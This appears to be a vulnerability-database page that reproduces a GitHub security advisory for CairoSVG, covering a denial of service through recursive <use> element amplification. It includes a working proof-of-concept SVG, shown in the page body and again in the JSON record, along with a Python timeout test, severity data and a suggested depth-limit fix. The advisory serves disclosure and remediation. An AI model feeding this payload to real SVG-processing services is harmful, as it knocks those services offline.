GHSA-F38F-5XPM-9R7C

Vulnerability from github – Published: 2026-03-13 18:57 – Updated: 2026-04-15 21:09
VLAI?
Summary
CairoSVG vulnerable to Exponential DoS via recursive <use> element amplification
Details

Summary

Kozea/CairoSVG (~300K downloads/week) has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py (line ~335). This causes CPU exhaustion from a small input.

Severity

High — CVSS 3.1: 7.5 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Vulnerable Code

File: cairosvg/defs.py (line ~335), function use()

The use() function recursively processes <use> elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.

Impact

  • 1,411-byte SVG payload pins CPU at 100% indefinitely
  • Memory stays flat at ~43MB — no OOM kill, process never terminates
  • Any service accepting SVG input (thumbnailing, PDF generation, avatar rendering) is DoS-able
  • Amplification factor: O(10^N) rendering calls from O(N) input

Proof of Concept

Save as poc.svg and run timeout 10 cairosvg poc.svg -o test.png:

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <defs>
    <g id="a"><rect width="1" height="1"/></g>
    <g id="b"><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/></g>
    <g id="c"><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/></g>
    <g id="d"><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/></g>
    <g id="e"><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/></g>
  </defs>
  <use xlink:href="#e"/>
</svg>

Expected: timeout kills the process after 10 seconds (it never completes on its own).

Alternatively test with Python:

import cairosvg, signal
signal.alarm(5)  # Kill after 5 seconds
try:
    cairosvg.svg2png(bytestring=open("poc.svg").read())
except:
    print("[!!!] CONFIRMED: CPU exhaustion — process did not complete in 5s")

Suggested Fix

Add recursion depth counter to use() function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.

References

Credit

Kai Aizen (SnailSploit) — Adversarial AI & Security Research

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.8.2"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "CairoSVG"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31899"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T18:57:31Z",
    "nvd_published_at": "2026-03-13T19:54:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nKozea/CairoSVG (~300K downloads/week) has exponential denial of service via recursive `\u003cuse\u003e` element amplification in `cairosvg/defs.py` (line ~335). This causes CPU exhaustion from a small input.\n\n## Severity\n\nHigh \u2014 CVSS 3.1: 7.5\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`\n\n## Vulnerable Code\n\nFile: `cairosvg/defs.py` (line ~335), function `use()`\n\nThe `use()` function recursively processes `\u003cuse\u003e` elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.\n\n## Impact\n\n- 1,411-byte SVG payload pins CPU at 100% indefinitely\n- Memory stays flat at ~43MB \u2014 no OOM kill, process never terminates\n- Any service accepting SVG input (thumbnailing, PDF generation, avatar rendering) is DoS-able\n- Amplification factor: O(10^N) rendering calls from O(N) input\n\n## Proof of Concept\n\nSave as `poc.svg` and run `timeout 10 cairosvg poc.svg -o test.png`:\n\n```xml\n\u003c?xml version=\"1.0\"?\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\u003e\n  \u003cdefs\u003e\n    \u003cg id=\"a\"\u003e\u003crect width=\"1\" height=\"1\"/\u003e\u003c/g\u003e\n    \u003cg id=\"b\"\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003c/g\u003e\n    \u003cg id=\"c\"\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003c/g\u003e\n    \u003cg id=\"d\"\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003c/g\u003e\n    \u003cg id=\"e\"\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003c/g\u003e\n  \u003c/defs\u003e\n  \u003cuse xlink:href=\"#e\"/\u003e\n\u003c/svg\u003e\n```\n\nExpected: `timeout` kills the process after 10 seconds (it never completes on its own).\n\nAlternatively test with Python:\n```python\nimport cairosvg, signal\nsignal.alarm(5)  # Kill after 5 seconds\ntry:\n    cairosvg.svg2png(bytestring=open(\"poc.svg\").read())\nexcept:\n    print(\"[!!!] CONFIRMED: CPU exhaustion \u2014 process did not complete in 5s\")\n```\n\n## Suggested Fix\n\nAdd recursion depth counter to `use()` function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.\n\n## References\n\n- [CWE-400](https://cwe.mitre.org/data/definitions/400.html)\n\n## Credit\n\nKai Aizen (SnailSploit) \u2014 Adversarial AI \u0026 Security Research",
  "id": "GHSA-f38f-5xpm-9r7c",
  "modified": "2026-04-15T21:09:46Z",
  "published": "2026-03-13T18:57:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-f38f-5xpm-9r7c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/commit/6dde8685ed3f19837767bce7a13a5491e3d0e0bf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Kozea/CairoSVG"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CairoSVG vulnerable to Exponential DoS via recursive \u003cuse\u003e element amplification"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.